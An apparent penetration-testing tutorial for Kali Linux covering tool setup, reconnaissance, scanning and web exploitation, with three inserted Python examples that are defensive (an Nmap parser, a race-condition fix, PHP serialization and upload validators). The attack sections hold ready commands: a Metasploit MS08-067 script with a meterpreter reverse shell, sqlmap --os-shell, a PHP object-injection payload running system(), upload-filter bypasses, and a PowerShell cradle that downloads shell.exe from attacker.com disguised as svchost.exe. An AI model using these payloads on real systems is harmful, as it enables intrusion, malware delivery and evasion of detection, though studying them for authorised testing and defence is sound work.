Advanced Kali Linux Penetration Testing: Setup, Reconnaissance, and Exploitation
Environment Customization and Setup
Kali Linux provides a robust foundation for penetration testing. Customizing the desktop environment and installing supplementary tools enhances operational efficiency.
Configuring Alternate Desktop Environments
Different desktop environments cater to varying hardware capabilities and user preferences. Install Xfce, a lightweight and fast environment, alongside its plugins:
sudo apt update
sudo apt install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
During installation, select lightdm as the default display manager. After completion, update the session manager to default to Xfce:
sudo update-alternatives --config x-session-manager
Select the xfce4-session option from the list, then log out and back in.
Similarly, Mate, LXDE, and KDE can be installed:
# Mate
sudo apt install desktop-base mate-desktop-environment
# LXDE
sudo apt install lxde-core lxde
# KDE Plasma
sudo apt install kali-defaults kali-root-login desktop-base kde-plasma-desktop
Always run update-alternatives --config x-session-manager to switch the active environment.
Deploying Custom Reconnaissance Tools
Supplementary GitHub repositories extend Kali's capabilities significantly.
Dnscan: A Python script for subdomain enumeration using wordlists.
git clone https://github.com/rbsec/dnscan.git
cd dnscan
./dnscan.py -h
Subbrute: Enumerates subdomains via public resolvers, adding an anonymity layer.
git clone https://github.com/TheRook/subbrute.git
cd subbrute
./subbrute.py -s /path/to/wordlist.txt target.org
Dirsearch: A rapid command-line directory brute-forcer.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
./dirsearch.py -u target.org -e php,asp
Auditing VPN Endpoints with ike-scan
Internet Key Exchange (IKE) VPNs configured for Aggressive Mode send the PSK-derived authentication hash in the clear. ike-scan identifies such endpoints and captures that hash so the pre-shared key (PSK) can be recovered offline.
Install and compile the tool:
git clone https://github.com/royhills/ike-scan.git
cd ike-scan
sudo apt install autoconf
autoreconf --install
./configure
make
sudo make install
Scan a target for Aggressive Mode handshakes:
ike-scan 10.0.0.1 -M -A
If a valid group ID is required to elicit a response:
ike-scan 10.0.0.1 -M -A id=vpn_group
Capture the PSK hash to a file using the -P flag, then crack it using psk-crack:
psk-crack -d /usr/share/wordlists/rockyou.txt /path/to/captured_hash
Routing Traffic through Proxychains
To maintain anonymity, route application traffic through intermediate proxies or the Tor network.
Edit the proxy configuration file:
sudo nano /etc/proxychains.conf
Uncomment dynamic_chain or random_chain depending on the routing strategy. Append proxy server details at the bottom of the file. To use Tor:
sudo apt install tor
tor
proxychains firefox
Reconnaissance and Intelligence Gathering
Effective penetration testing relies on exhaustive data collection prior to exploitation.
Subdomain and Information Enumeration
Fierce: Discovers subdomains using DNS brute-forcing.
fierce --domain target.org --threads 8
DMitry: Extracts Netcraft data, emails, and TCP port scan results.
dmitry -s -e -w -p target.org
theHarvester: Aggregates emails, subdomains, and host data from public search engines.
theharvester -d target.org -l 50 -b all
WhatWeb: Identifies the underlying technologies, web frameworks, and server software.
whatweb target.org
Leveraging Shodan for IoT and Service Discovery
Shodan indexes internet-connected devices. Dorks refine searches to specific services and regions.
port:"21" country:"US": Finds FTP servers in the United States.
org:"ISP Name": Filters by organization.
net:192.168.0.0/24: Scans an IP range.
Use the Honeyscore service (honeyscore.shodan.io) to determine if a target IP is a honeypot.
Port Scanning and Firewall Evasion
Nmap remains the standard for network mapping.
- Service version detection skipping ping:
nmap -Pn -sV 10.0.0.1
- Aggressive scan:
nmap -A -Pn 10.0.0.1
- DNS brute-force script:
nmap -Pn -sV target.org --script dns-brute
To map the rules of a stateless firewall, ACK scans (-sA) send bare ACK probes and never complete a connection, so nothing reaches application logs; Window scans (-sW) use the same probes but also distinguish open from closed ports through TCP window size anomalies in the replies. Idle scans (-sI) send spoofed probes through a zombie host, so the target only ever sees the zombie's IP rather than the attacker's.
Masscan: Offers unparalleled speed for large network scopes.
masscan 10.0.0.0/24 -p 80,443,22 --max-rate 1000
SSL and Directory Analysis
sslscan: Evaluates SSL/TLS configurations and identifies weak ciphers.
sslscan target.org:443
Dirb: Brute-forces web directories. It is slower than alternatives but reliable.
dirb https://target.org
Wireless Monitoring and ACL Testing
Kismet: A layer 2 wireless detector. Launch it with kismet, specify the monitor mode interface (e.g., wlan0), and configure channel hopping.
Firewalk: Determines allowed protocols through a firewall by analyzing TCP TTL expiration.
firewalk -S1-25 -i eth0 10.0.0.1 10.0.0.2
Vulnerability Assessment and Exploitation Frameworks
Web Application Proxies and Scanners
Burp Suite intercepts HTTP traffic, automates attacks, and scans for vulnerabilities. Install extensions from the BApp Store such as J2EEScan and Wsdler.
To exploit WSDL endpoints, intercept the SOAP request, parse it with Wsdler, and forward requests to Repeater for parameter manipulation.
Intruder facilitates automated payload delivery. For a login brute-force, set payload positions around the username and password fields, use the Pitchfork attack type, and assign a distinct wordlist to each payload set.
Vega provides an alternative GUI-based scanner with proxy capabilities.
sudo apt install vega
vega
Exploit Databases and Router Frameworks
SearchSploit: Offline CLI utility for Exploit-DB.
searchsploit apache 2.4
searchsploit -m 12345 # Copy exploit to current directory
RouterSploit: Framework tailored for embedded device exploitation.
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
use scanners/cisco_scan
set target 10.0.0.1
run
Metasploit Framework Automation
Initialize the database and launch the console:
sudo systemctl start postgresql
msfdb init
msfconsole
Create an isolated workspace:
workspace -a ProjectAlpha
Import Nmap XML data and query hosts:
db_import /path/to/scan.xml
hosts -c address,os_flavor
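The same address and OS view can be produced outside the console from the Nmap XML file, which is useful for asset inventory and for checking what an import will contain. This is an added example, not code from the article or from Metasploit; SAMPLE_NMAP_XML is a constructed three-host scan, and the os_flavor mapping is an approximation of the framework's own normalisation.

```python
"""Added example, not from the article: turn Nmap -oX output into the same
address / os_flavor view that `hosts -c address,os_flavor` gives after
db_import. SAMPLE_NMAP_XML is a constructed three-host scan."""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -Pn -oX scan.xml 10.0.0.0/29">
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <os><osmatch name="Microsoft Windows Server 2008 R2" accuracy="97">
      <osclass vendor="Microsoft" osfamily="Windows" osgen="2008"/>
    </osmatch></os>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds"/></port></ports>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/>
      <service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="filtered"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.0.7" addrtype="ipv4"/></host>
</nmaprun>"""

def parse_hosts(xml_text):
    """Return [(address, os_flavor, open_ports)] for every host that is up.
    os_flavor here is the highest-accuracy osmatch name (an approximation:
    Metasploit's own normalisation differs in detail); no OS data -> ''."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                       # db_import keeps live hosts only
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), "?")
        best = max(host.iter("osmatch"), default=None,
                   key=lambda m: int(m.get("accuracy", "0")))
        flavor = best.get("name", "") if best is not None else ""
        ports = sorted(int(p.get("portid")) for p in host.iter("port")
                       if p.find("state") is not None
                       and p.find("state").get("state") == "open")
        rows.append((addr, flavor, ports))
    return rows

if __name__ == "__main__":
    for addr, flavor, ports in parse_hosts(SAMPLE_NMAP_XML):
        print(f"{addr:<12} {flavor or '-':<34} open: {ports}")
```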
Resource scripts automate repetitive tasks. Create a file named exploit.rc:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOSTS 10.0.0.5
set LHOST 10.0.0.10
set LPORT 8443
exploit -j
Execute the script within the console: resource exploit.rc.
Advanced Web Application Exploitation
Validating Cross-Site Scripting (XSS)
The xssValidator Burp extension uses PhantomJS and SlimerJS to verify blind XSS payloads automatically.
Launch the validation servers:
phantomjs xss.js & slimerjs slimer.js &
Configure Intruder to use the extension-generated payloads. In the Intruder options tab, add the Grep phrase from the xssValidator tab to identify successful execution in responses.
Automating SQL Injection with sqlmap
sqlmap -u "http://target.org/page.php?id=1" --dbs
Key operational flags include --tables to dump table names, --os-shell to obtain an operating system command prompt, and --tamper to bypass WAFs using evasion scripts.
Source Code Repository Exfiltration
Exposed .git or .svn directories allow attackers to reconstruct application source code.
git clone https://github.com/kost/dvcs-ripper.git
cd dvcs-ripper
./rip-git.pl -v -u http://target.org/.git/
Exploiting Race Conditions
Race conditions occur when multiple threads interact with shared data simultaneously. Using Burp Intruder, send the same request repeatedly with a Null payload, and set concurrent threads to 20-25 so the requests execute the transaction in parallel and trigger the vulnerability.
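Why parallel requests work against such a transaction, and what the fix looks like, as an added example that is not part of the article: Account is a hypothetical withdrawal handler with a check-then-act bug beside its locked version, and the 20 threads mirror the Intruder setting above.

```python
"""Added example (not from the article): why sending one request from many
threads at once defeats a check-then-act transaction, and the fix. Account
is a hypothetical handler; 20 threads mirror the Intruder setting above."""
import threading, time

class Account:
    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_racy(self, amount):
        # Vulnerable: the check and the debit are not atomic, so every
        # parallel request can pass the check before any of them debits.
        if self.balance >= amount:
            time.sleep(0.05)             # stands in for DB/network latency
            self.balance -= amount
            return True
        return False

    def withdraw_safe(self, amount):
        # Hardened: check and debit run under one lock (in a real service:
        # SELECT ... FOR UPDATE or an atomic conditional UPDATE).
        with self.lock:
            if self.balance >= amount:
                time.sleep(0.05)
                self.balance -= amount
                return True
            return False

def hammer(handler, amount, threads=20):
    """Call handler(amount) from `threads` threads released together;
    return how many calls reported success."""
    results, gate = [], threading.Barrier(threads)
    def worker():
        gate.wait()                      # all requests start at the same moment
        results.append(handler(amount))
    pool = [threading.Thread(target=worker) for _ in range(threads)]
    for t in pool: t.start()
    for t in pool: t.join()
    return sum(results)

def demo():
    """Return (racy successes, racy balance, safe successes, safe balance)."""
    racy, safe = Account(100), Account(100)
    return (hammer(racy.withdraw_racy, 100), racy.balance,
            hammer(safe.withdraw_safe, 100), safe.balance)

if __name__ == "__main__":
    print("racy: %d of 20 succeeded, balance %d | safe: %d succeeded, balance %d"
          % demo())
```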
Targeting JBoss with JexBoss
JexBoss exploits misconfigured JBoss, WebLogic, and Tomcat servers.
pip install -r requires.txt
python jexboss.py -host http://target.org:8080
PHP Object Injection
When user input is passed unsanitized to unserialize(), an attacker can manipulate object properties. If the application defines a class with magic methods like __wakeup(), craft a serialized payload:
<?php
class VulnerableClass {
public $payload = "system('id');";
}
$instance = new VulnerableClass;
echo serialize($instance);
?>
Pass the resulting serialized string via the vulnerable parameter to achieve Remote Code Execution.
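On the defensive side, the serialized string above is recognisable before it ever reaches unserialize(). The following is an added example, not code from the article: a small parser for PHP's serialize() format that a request filter can use to reject any input carrying an object token, which enforces the same policy as unserialize($s, ['allowed_classes' => false]); the function names are chosen here.

```python
"""Added example (not from the article): a parser for PHP's serialize()
format that lets a request filter refuse any input carrying an O: (object)
token, the same policy as unserialize($s, ['allowed_classes' => false])."""

def _parse(data, pos):
    """Parse one value at data[pos]; return (value, index after it). Objects
    come back as ('O', class_name, props); unhandled tags raise ValueError."""
    tag = data[pos]
    if tag == 'N': return None, pos + 2                 # N;
    if tag in 'ib':                                     # i:42;  b:1;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == 's':                                      # s:7:"payload";  length-prefixed,
        colon = data.index(':', pos + 2)                # so ';' or '"' inside are harmless
        length = int(data[pos + 2:colon])
        start = colon + 2                               # skip :"
        if data[start + length:start + length + 2] != '";':
            raise ValueError('string length mismatch at %d' % pos)
        return data[start:start + length], start + length + 2
    if tag in 'aO':                                     # a:2:{...}  O:15:"Cls":1:{...}
        name, count_start = None, pos + 2
        if tag == 'O':
            colon = data.index(':', pos + 2)
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len]
            count_start = colon + 2 + name_len + 2      # past the closing ":
        colon = data.index(':', count_start)
        count, pos, items = int(data[count_start:colon]), colon + 2, {}   # skip :{
        for _ in range(count):
            key, pos = _parse(data, pos)
            items[key], pos = _parse(data, pos)
        if data[pos] != '}':
            raise ValueError('unterminated container at %d' % pos)
        return (('O', name, items) if name is not None else items), pos + 1
    raise ValueError('unknown tag %r at %d' % (tag, pos))

def has_object(value):
    """True if a parsed value is, or contains, a PHP object."""
    if isinstance(value, tuple):                        # ('O', class_name, props)
        return True
    return isinstance(value, dict) and any(has_object(v) for v in value.values())

def is_safe_to_unserialize(payload):
    """True only if the payload parses completely and builds no object."""
    try:
        value, end = _parse(payload, 0)
    except (ValueError, IndexError, TypeError):         # malformed: fail closed
        return False
    return end == len(payload) and not has_object(value)
```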
Establishing Backdoors via File Uploads
Strict file upload validations can be bypassed by prepending image file headers (e.g., GIF87a) to malicious PHP code, or by using alternative extensions like .pht or .phtml.
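An upload check that both of those bypasses fail against, as an added example that is not code from the article: validate_upload and the sample files are constructed here, and a production handler should additionally re-encode images with an image library rather than storing the bytes as received.

```python
"""Added example (not from the article): an upload check that the header
prepending and alternative extension tricks above do not get past.
validate_upload and SAMPLES are constructed for this demonstration."""
import os

# Extension allow-list -> accepted magic bytes. A deny-list of .php would
# miss .pht/.phtml; an allow-list rejects them without naming them.
ALLOWED = {".png": (b"\x89PNG\r\n\x1a\n",),
           ".gif": (b"GIF87a", b"GIF89a"),
           ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}
PHP_OPEN_TAGS = (b"<?php", b"<?=", b"<script")

def validate_upload(filename, data):
    """Return (accepted, reason). Policy: exactly one extension, taken from
    the allow-list; magic bytes must match that extension; and because a
    valid header proves nothing about the rest, the body is scanned for
    PHP open tags as well."""
    name = os.path.basename(filename).lower()
    root, ext = os.path.splitext(name)
    if not root or "." in root:            # rejects .htaccess, shell.php.png
        return False, "exactly one extension required"
    if ext not in ALLOWED:
        return False, "extension %r not allowed" % ext
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match %s" % ext
    if any(tag in data for tag in PHP_OPEN_TAGS):
        return False, "embedded PHP code"
    return True, "ok"

SAMPLES = {                                # constructed inputs, not real uploads
    "avatar.gif":    b"GIF89a\x01\x00\x01\x00\x80\x00\x00",   # genuine header
    "avatar.phtml":  b"GIF87a<?php echo 'x'; ?>",             # alternative extension
    "polyglot.gif":  b"GIF87a<?php echo 'x'; ?>",             # header prepended to PHP
    "fake.png":      b"GIF87a\x01\x00",                       # header/extension mismatch
    "shell.php.png": b"\x89PNG\r\n\x1a\n\x00",                # double extension
}

def check_all():
    """Run every sample through the validator; return {name: accepted}."""
    return {name: validate_upload(name, data)[0] for name, data in SAMPLES.items()}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print("%-14s %s" % (name, validate_upload(name, data)))
```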
If OS-level access is obtained via SQL injection (--os-shell), escalate to a Meterpreter session using a PowerShell download cradle:
Set-Content -Path "fetch.ps1" -Value '$downloader = New-Object System.Net.WebClient'
Add-Content -Path "fetch.ps1" -Value '$downloader.DownloadFile("http://attacker.com/shell.exe", "C:\Temp\svchost.exe")'
powershell -executionpolicy bypass -file fetch.ps1
Execute the downloaded payload locally to catch the reverse shell.